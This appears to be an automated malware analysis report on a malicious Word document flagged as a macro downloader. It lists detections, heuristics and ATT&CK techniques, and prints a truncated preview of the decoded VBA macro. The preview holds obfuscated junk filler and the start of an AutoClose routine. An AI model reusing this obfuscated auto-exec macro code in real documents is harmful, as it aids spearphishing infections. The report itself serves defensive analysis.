MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoClose event and uses GetObject, indicating an attempt to execute code. ClamAV identifies this as Doc.Downloader.Valyria-6595163-0, suggesting its primary function is to download and execute a secondary payload. The presence of a VBA macro strongly suggests it was delivered as a spearphishing attachment.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 84405 bytes |
SHA-256: 9caf581e2b2dbd95063962b0b37f9c60569a0e58a1149d76a6460204eb3c49f6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TRogowUggeCUB()
Debug.Print "quzuTutIHEV"
Dim qEpiFupcUdATiKUQacexiQE
qEpiFupcUdATiKUQacexiQE = Log(4)
qEpiFupcUdATiKUQacexiQE = qEpiFupcUdATiKUQacexiQE + Log(13)
Dim GoPeUxoMirhyvuduzyXuX
GoPeUxoMirhyvuduzyXuX = Rnd(112)
If GoPeUxoMirhyvuduzyXuX > 35824 Then
GoPeUxoMirhyvuduzyXuX = Exp(2)
End If
HUmixucynUsAxkuQOafy = 17431
Dim LEDEKOPYNuw
qiNitorAtUw = 57399
HIDEDuQyVazAkYX = InStr("nAriByCoFeXYxum", "nAriByCoFeXYxumnAriByCoFeXYxum")
LEDEKOPYNuw = Rnd(113)
Dim NoxiDOzUsOHu
NoxiDOzUsOHu = Rnd(1210)
If NoxiDOzUsOHu > 64484 Then
NoxiDOzUsOHu = Exp(10)
End If
If LEDEKOPYNuw > 45424 Then
jAxzYNoMIwIw = InStr("pIcAHOsUMAcitUT", "pIcAHOsUMAcitUTpIcAHOsUMAcitUT")
QuKHlUGazgymObibYt = 57721
LEDEKOPYNuw = Exp(3)
vYmevyVySWezEvYBOzAJem = InStr("jiSUToGIliojeKIMUr", "jiSUToGIliojeKIMUrjiSUToGIliojeKIMUr")
zakORadYmixei = 44345
End If
PIvexquairiheFytuCONc = Val("8537.7") & "FYvoZeXEWASIXIC"
bEWediuWaNePiwU = Val("96741.8") & "qizyfytOLydYDINIVU"
Dim UtYRyNaCEhYvuPOvILoH
UtYRyNaCEhYvuPOvILoH = Rnd(136)
If UtYRyNaCEhYvuPOvILoH > 13397 Then
UtYRyNaCEhYvuPOvILoH = Exp(6)
End If
Dim pObeTuLoHxIxENEsIheZAH
For pObeTuLoHxIxENEsIheZAH = 7 To 13
bOZyZuWyPYsAiqecETE = Val("93980.6") & "cuqUdaTEbisuHuGE"
Dim wuaaBIGEgoSXaqlUrAq
wuaaBIGEgoSXaqlUrAq = Fix(49017)
Dim JyxebyZuziJIZ
JyxebyZuziJIZ = Log(7)
JyxebyZuziJIZ = JyxebyZuziJIZ + Log(13)
Dim QufoMuZYGIvegoV
QufoMuZYGIvegoV = Rnd(135)
If QufoMuZYGIvegoV > 63765 Then
QufoMuZYGIvegoV = Exp(5)
End If
Next
kiiAxadizAvYsypYaPaZe = InStr("rOgUlYzIaeTEQUPIXfId", "rOgUlYzIaeTEQUPIXfIdrOgUlYzIaeTEQUPIXfId")
Dim bIDefoRYLeaesImi
For bIDefoRYLeaesImi = 2 To 12
Dim ZAZOlAaCinufatrIZUBUHo
ZAZOlAaCinufatrIZUBUHo = Fix(76244)
Next
xYHiQogyKuGgUnAcuN = Val("60251.10") & "VYMyHuZudesIxAwIJIwA"
Dim namyiODTfUkabA
namyiODTfUkabA = Log(6)
namyiODTfUkabA = namyiODTfUkabA + Log(10)
ZEtusyXOcAMUNUFea = 98457
End Sub
Sub AutoClose()
SeRahOluiINUwOzuX = Val("92360.4") & "kEnoBohunEmYW"
Dim XIDuxilUSaRYiiaoHIz
For XIDuxilUSaRYiiaoHIz = 8 To 11
Dim fURAiUleaOMaMetAX
fURAiUleaOMaMetAX = Fix(94668)
Next
Dim vYMoROQuCeneDyV
vYMoROQuCeneDyV = Log(4)
bEVUjOGOJajO = InStr("BIXOpUlIKepYB", "BIXOpUlIKepYBBIXOpUlIKepYB")
ZixisyHexiVoiumOw = Val("506.7") & "hoFeDEpygeLAzUSyVavAmib"
vYMoROQuCeneDyV = vYMoROQuCeneDyV + Log(11)
On Error Resume Next
LibywUQyTyL = Val("62944.8") & "qikYbwAsysOSEiegIGE"
Dim opEtAGYLYx
For opEtAGYLYx = 7 To 12
Dim tesosiPygyTEKaHAxOfa
tesosiPygyTEKaHAxOfa = Fix(80502)
Next
Dim kUkANOFuNehIqHypEJyRidA
WIbuHacuPYtaSE = Val("44302.6") & "aiBYpyqYioLAjewyDEPyTUn"
Dim BAferZYVazEkiNjuRaBY
BAferZYVazEkiNjuRaBY = Log(6)
BAferZYVazEkiNjuRaBY = BAferZYVazEkiNjuRaBY + Log(12)
kUkANOFuNehIqHypEJyRidA = Log(8)
kUkANOFuNehIqHypEJyRidA = kUkANOFuNehIqHypEJyRidA + Log(10)
Debug.Print "JYJESabUwaCudYvoL"
Dim ZiPalujopuDeVSE
For ZiPalujopuDeVSE = 1 To 13
Dim FYfyQeXyMIX
FYfyQeXyMIX = Fix(36647)
Next
Dim kuoPehiZidYf
kuoPehiZidYf = Rnd(124)
If kuoPehiZidYf > 8670 Then
kuoPehiZidYf = Exp(4)
End If
OsoDamlurIzyLeriLeR = InStr("YLeZixoSYmfePIT", "YLeZixoSYmfePITYLeZixoSYmfePIT")
hEGAluFeayrAJ = InStr("gyteFYtErAzOwSeBU", "gyteFYtErAzOwSeBUgyteFYtErAzOwSeBU")
vaXilAWiCyTuSOQuJepIcusA = InStr("HIiUdEFiYDuVUXIKAwoMIJ", "HIiUdEFiYDuVUXIKAwoMIJHIiUdEFiYDuVUXIKAwoMIJ")
Dim RoGEMATozUkiG
For RoGEMATozUkiG = 2 To 11
Dim HIwamiMYrosypeNYC
HIwamiMYrosypeNYC = Fix(6751)
Next
xoSESEkErmiQHevY = vbNullString
Dim laPUDinYQEp
laPUDinYQEp = Log(1)
laPUDinYQEp = laPUDinYQEp + Log(13)
Debug.Print "xazYkYnmIZuJaEcosubI"
Dim TuHeFyJfyHaHibyaEPOl
LozUwurOgipY = Val("11561.9") & "tULyxafOBeLadEWig"
joYvALkUvEKiWExol = InStr("NuNOhVYcIcUVAKegEfo", "NuNOhVYcIcUVAKegEfo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.